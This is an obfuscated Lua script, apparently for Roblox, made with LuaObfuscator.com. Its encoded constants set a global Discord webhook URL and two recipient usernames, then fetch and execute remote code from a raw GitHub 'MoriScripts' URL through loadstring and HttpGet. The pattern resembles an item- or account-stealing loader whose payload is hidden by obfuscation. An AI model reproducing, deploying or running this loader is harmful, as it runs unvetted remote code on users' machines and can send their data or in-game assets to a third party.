--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32=0 -0 ;local v33;local v34;while true do if (v32==1) then return (v34 * (732 -(1044 -(367 + 201)))) + v33 ;end if (v32==(0 -0)) then v33,v34=v1(v16,v19,v19 + (4 -2) );v19=v19 + (621 -(555 + 64)) ;v32=932 -(857 + 74) ;end end end v18=3;end if (v18==4) then function v25()local v35=v24();local v36=v24();local v37=1;local v38=(v21(v36,928 -((525 -311) + 713) ,6 + 14 ) * ((1 + 1)^(909 -(282 + 595)))) + v35 ;local v39=v21(v36,1658 -(1523 + 114) ,28 + 3 );local v40=((v21(v36,45 -(193 -(67 + 113)) )==1) and  -(1066 -(68 + 997))) or (1271 -(226 + 768 + 276)) ;if (v39==(0 -0)) then if (v38==(117 -((127 -95) + 85))) then return v40 * (0 + 0) ;else v39=1;v37=0;end elseif (v39==(454 + 1593)) then return ((v38==(957 -(892 + 65))) and (v40 * (((2 + 0) -(953 -(802 + 150)))/0))) or (v40 * NaN) ;end return v8(v40,v39-(1890 -867) ) * (v37 + (v38/((3 -1)^(402 -(87 + 263))))) ;end v26=nil;function v26(v41)local v42=0 -0 ;local v43;local v44;while true do if (v42==(1 -0)) then v43=v3(v16,v19,(v19 + v41) -(1 + 0) );v19=v19 + v41 ;v42=(1774 -775) -(915 + 82) ;end if ((0 -0)==v42) then v43=nil;if  not v41 then v41=v24();if (v41==(0 + 0)) then return "";end end v42=1 -0 ;end if (v42==(1189 -(1061 + 8 + 118))) then v44={};for v76=2 -1 , #v43 do v44[v76]=v2(v1(v3(v43,v76,v76)));end v42=6 -3 ;end if (v42==(1 + (793 -(368 + 423)))) then return v6(v44);end end end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==(75 -(71 + 3))) then v48=nil;v49=nil;v45=2 + 0 ;end if ((4 -2)~=v45) then else v50=nil;v51=nil;v45=3;end if (v45~=(0 -0)) then else v46=0;v47=nil;v45=1;end if (v45==3) then v52=nil;v53=nil;v45=4;end if (v45~=4) then else while true do if (v46==0) then local v96=0;while true do if (v96==1) then v46=242 -(187 + 54) ;break;end if (v96==(780 -(162 + 618))) then v47=0 + 0 ;v48=nil;v96=1 + 0 ;end end end if ((3 -1)~=v46) then else local v97=0;while true do if (v97~=(0 -0)) then else v51=nil;v52=nil;v97=1;end if ((1 + 0)==v97) then v46=1639 -(1373 + 263) ;break;end end end if (v46==3) then v53=nil;while true do local v99=1000 -(451 + 549) ;while true do if (v99~=(1 + 0)) then else if (v47~=(0 -0)) then else local v105=0;while true do if (v105~=0) then else v48={};v49={};v105=1 -0 ;end if (v105~=1) then else v50={};v47=1;break;end end end if (2~=v47) then else local v106=1384 -(746 + 638) ;while true do if ((1 + 0)==v106) then for v151=1,v24() do local v152=0 -0 ;local v153;local v154;local v155;local v156;while true do if ((342 -(218 + 123))==v152) then v155=nil;v156=nil;v152=2;end if (v152==2) then while true do if (v153~=(1581 -(1535 + 46))) then else v154=0 + 0 ;v155=nil;v153=1 + 0 ;end if ((561 -(306 + 254))~=v153) then else v156=nil;while true do if (v154==1) then while true do if (v155==0) then v156=v22();if (v21(v156,1,1 + 0 )==(0 -0)) then local v183=1467 -(899 + 568) ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==(0 + 0)) then local v190=0 -0 ;while true do if ((603 -(268 + 335))==v190) then v184=290 -(60 + 230) ;v185=nil;v190=573 -(426 + 146) ;end if (v190~=1) then else v183=1;break;end end end if (v183==(1 + 0)) then v186=nil;v187=nil;v183=2;end if (v183~=(1458 -(282 + 1174))) then else v188=nil;while true do if (v184==0) then v185=0;v186=nil;v184=1;end if (2~=v184) then else while true do if (v185~=3) then else if (v21(v187,814 -(569 + 242) ,8 -5 )==(1 + 0)) then v188[1028 -(706 + 318) ]=v53[v188[1255 -(721 + 530) ]];end v48[v151]=v188;break;end if (v185~=(1273 -(945 + 326))) then else local v194=0;while true do if (v194~=1) then else v185=7 -4 ;break;end if ((0 + 0)==v194) then if (v21(v187,1,1)==1) then v188[702 -(271 + 429) ]=v53[v188[2 + 0 ]];end if (v21(v187,2,1502 -(1408 + 92) )~=1) then else v188[1089 -(461 + 625) ]=v53[v188[1291 -(993 + 295) ]];end v194=1 + 0 ;end end end if (v185~=(1171 -(418 + 753))) then else local v195=0 + 0 ;local v196;while true do if (v195~=(0 + 0)) then else v196=0 + 0 ;while true do if (v196~=(0 + 0)) then else local v205=529 -(406 + 123) ;local v206;while true do if (v205==(1769 -(1749 + 20))) then v206=0;while true do if ((0 + 0)==v206) then v186=v21(v156,2,1325 -(1249 + 73) );v187=v21(v156,4,3 + 3 );v206=1146 -(466 + 679) ;end if (v206~=1) then else v196=2 -1 ;break;end end break;end end end if (v196==1) then v185=2 -1 ;break;end end break;end end end if (v185==(1901 -(106 + 1794))) then local v197=0;while true do if (v197~=1) then else v185=2;break;end if (v197~=(0 + 0)) then else local v200=0;while true do if (v200~=0) then else local v207=0;while true do if (v207~=(1 + 0)) then else v200=1;break;end if (v207~=0) then else v188={v23(),v23(),nil,nil};if (v186==(1427 -(41 + 1386))) then local v208=0;local v209;while true do if ((103 -(17 + 86))~=v208) then else v209=0;while true do if (v209~=0) then else v188[3 + 0 ]=v23();v188[4]=v23();break;end end break;end end elseif (v186==1) then v188[3]=v24();elseif (v186==(3 -1)) then v188[3]=v24() -(2^(46 -30)) ;elseif (v186~=(169 -(122 + 44))) then else local v214=0;local v215;while true do if (v214~=0) then else v215=0;while true do if (v215~=0) then else v188[5 -2 ]=v24() -(2^(52 -36)) ;v188[4]=v23();break;end end break;end end end v207=1;end end end if (v200==(1 + 0)) then v197=1 + 0 ;break;end end end end end end break;end if (v184==1) then local v191=0;local v192;while true do if (v191==0) then v192=0;while true do if (v192~=(0 -0)) then else v187=nil;v188=nil;v192=1;end if (v192~=1) then else v184=2;break;end end break;end end end end break;end end end break;end end break;end if (v154~=0) then else local v178=65 -(30 + 35) ;local v179;while true do if (v178~=(0 + 0)) then else v179=1257 -(1043 + 214) ;while true do if (v179~=(3 -2)) then else v154=1213 -(323 + 889) ;break;end if (0==v179) then local v189=0;while true do if (v189~=(0 -0)) then else v155=0;v156=nil;v189=1;end if (v189==(581 -(361 + 219))) then v179=321 -(53 + 267) ;break;end end end end break;end end end end break;end end break;end if (v152~=0) then else v153=0 + 0 ;v154=nil;v152=414 -(15 + 398) ;end end end v47=985 -(18 + 964) ;break;end if (v106==(0 -0)) then for v157=1,v52 do local v158=0 + 0 ;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=(0 + 0)) then else v159=850 -(20 + 830) ;v160=nil;v158=1;end if (v158~=2) then else v163=nil;while true do if (v159==(1 + 0)) then v162=nil;v163=nil;v159=128 -(116 + 10) ;end if (v159==(0 + 0)) then local v177=0;while true do if (v177~=1) then else v159=1;break;end if (v177~=0) then else v160=0;v161=nil;v177=739 -(542 + 196) ;end end end if (v159~=(3 -1)) then else while true do if (v160==(0 + 0)) then v161=0 + 0 ;v162=nil;v160=1 + 0 ;end if (v160==(2 -1)) then v163=nil;while true do if (v161~=(0 -0)) then else local v180=0;local v181;while true do if (v180~=0) then else v181=0;while true do if (v181~=1) then else v161=1;break;end if (v181~=(1551 -(1126 + 425))) then else v162=v22();v163=nil;v181=1;end end break;end end end if ((406 -(118 + 287))~=v161) then else if (v162==(3 -2)) then v163=v22()~=0 ;elseif (v162==(1123 -(118 + 1003))) then v163=v25();elseif (v162~=(8 -5)) then else v163=v26();end v53[v157]=v163;break;end end break;end end break;end end break;end if (v158==(378 -(142 + 235))) then v161=nil;v162=nil;v158=2;end end end v51[13 -10 ]=v22();v106=1 + 0 ;end end end break;end if (0==v99) then local v104=977 -(553 + 424) ;while true do if ((0 -0)==v104) then if ((1 + 0)==v47) then local v134=0;while true do if (v134==(0 + 0)) then v51={v48,v49,nil,v50};v52=v24();v134=2 -1 ;end if (v134~=1) then else v53={};v47=2;break;end end end if (v47~=(7 -4)) then else local v135=0 -0 ;while true do if (v135==0) then for v175=1,v24() do v49[v175-1 ]=v29();end return v51;end end end v104=1 + 0 ;end if ((4 -3)==v104) then v99=754 -(239 + 514) ;break;end end end end end break;end if (v46==(1 + 0)) then local v98=1329 -(797 + 532) ;while true do if (0~=v98) then else v49=nil;v50=nil;v98=1;end if (v98~=1) then else v46=2;break;end end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then v20=v0(v3(v54,1,1));return "";else local v69=v2(v0(v54,16));if v20 then local v78=v5(v69,v20);v20=nil;return v78;else return v69;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55,v56,v57,v58=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 2 + 2 ;return (v58 * (39447511 -22670295)) + (v57 * 65536) + (v56 * ((2189 -(476 + 255)) -(373 + 829))) + v55 ;end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (v62==1) then v65=v59[3];return function(...)local v79=v63;local v80=v64;local v81=v65;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92==0) then do return;end else v83=v91[3];end elseif (v92<=2) then local v108=0;local v109;while true do if (v108==0) then v109=v91[2];v89[v109]=v89[v109](v13(v89,v109 + 1 ,v84));break;end end elseif (v92==3) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=7) then if (v92<=5) then v83=v91[3];elseif (v92>6) then do return;end else v89[v91[2]]=v91[3];end elseif (v92<=8) then v89[v91[2]]=v61[v91[3]];elseif (v92>9) then v89[v91[2]]=v91[3];else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=15) then if (v92<=12) then if (v92>11) then v89[v91[2]]();else local v113=v91[2];local v114,v115=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v84=(v115 + v113) -1 ;local v116=0;for v128=v113,v84 do v116=v116 + 1 ;v89[v128]=v114[v116];end end elseif (v92<=13) then local v117=v91[2];local v118,v119=v82(v89[v117](v13(v89,v117 + 1 ,v91[3])));v84=(v119 + v117) -1 ;local v120=0;for v131=v117,v84 do local v132=0;while true do if (v132==0) then v120=v120 + 1 ;v89[v131]=v118[v120];break;end end end elseif (v92==14) then v89[v91[2]]();else local v144=0;local v145;local v146;while true do if (v144==1) then v89[v145 + 1 ]=v146;v89[v145]=v146[v91[4]];break;end if (v144==0) then v145=v91[2];v146=v89[v91[3]];v144=1;end end end elseif (v92<=18) then if (v92<=16) then local v121=v91[2];local v122=v89[v91[3]];v89[v121 + 1 ]=v122;v89[v121]=v122[v91[4]];elseif (v92==17) then v89[v91[2]]=v61[v91[3]];else v89[v91[2]]=v91[3]~=0 ;end elseif (v92<=19) then local v126=v91[2];v89[v126]=v89[v126](v13(v89,v126 + 1 ,v84));elseif (v92==20) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]]=v91[3]~=0 ;end v83=v83 + 1 ;end end;end if (v62==0) then v63=v59[1];v64=v59[2];v62=1;end end end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v70=1130 -(369 + 761) ;local v71;while true do if (v70==(0 + 0 + 0)) then v71=(v66/(((1506 -(363 + 1141)) -0)^(v67-(1 -(1580 -(1183 + 397))))))%((240 -(64 + 174))^(((v68-1) -(v67-(1 + (0 -0)))) + (1 -0))) ;return v71-(v71%((248 + 89) -(144 + 192))) ;end end else local v72=(218 -(42 + 174))^(v67-(1 + 0)) ;return (((v66%(v72 + v72))>=v72) and (1 + 0 + 0)) or 0 ;end end v22=nil;v18=2;end end end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O32393132343035382O3934352O362O322F2D47667066342O3572706C647447414F46483274676C4476466B4C4E31795A6B6D4B78694B2D434E58783151383957546C39687262654A5931627A666770344153622O44030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503083O005374616E31374D6B03093O00557365724E616D653200173O00120A3O00013O0026143O000E000100020004053O000E0001001211000100033O003004000100040005001211000100063O001211000200073O00201000020002000800120A000400094O0015000500014O000B000200054O001300013O00022O000E0001000100010004053O001600010026143O0001000100010004053O00010001001211000100033O0030040001000A000B001211000100033O0030040001000C000B00120A3O00023O0004053O000100016O00017O00",v9(),...);end
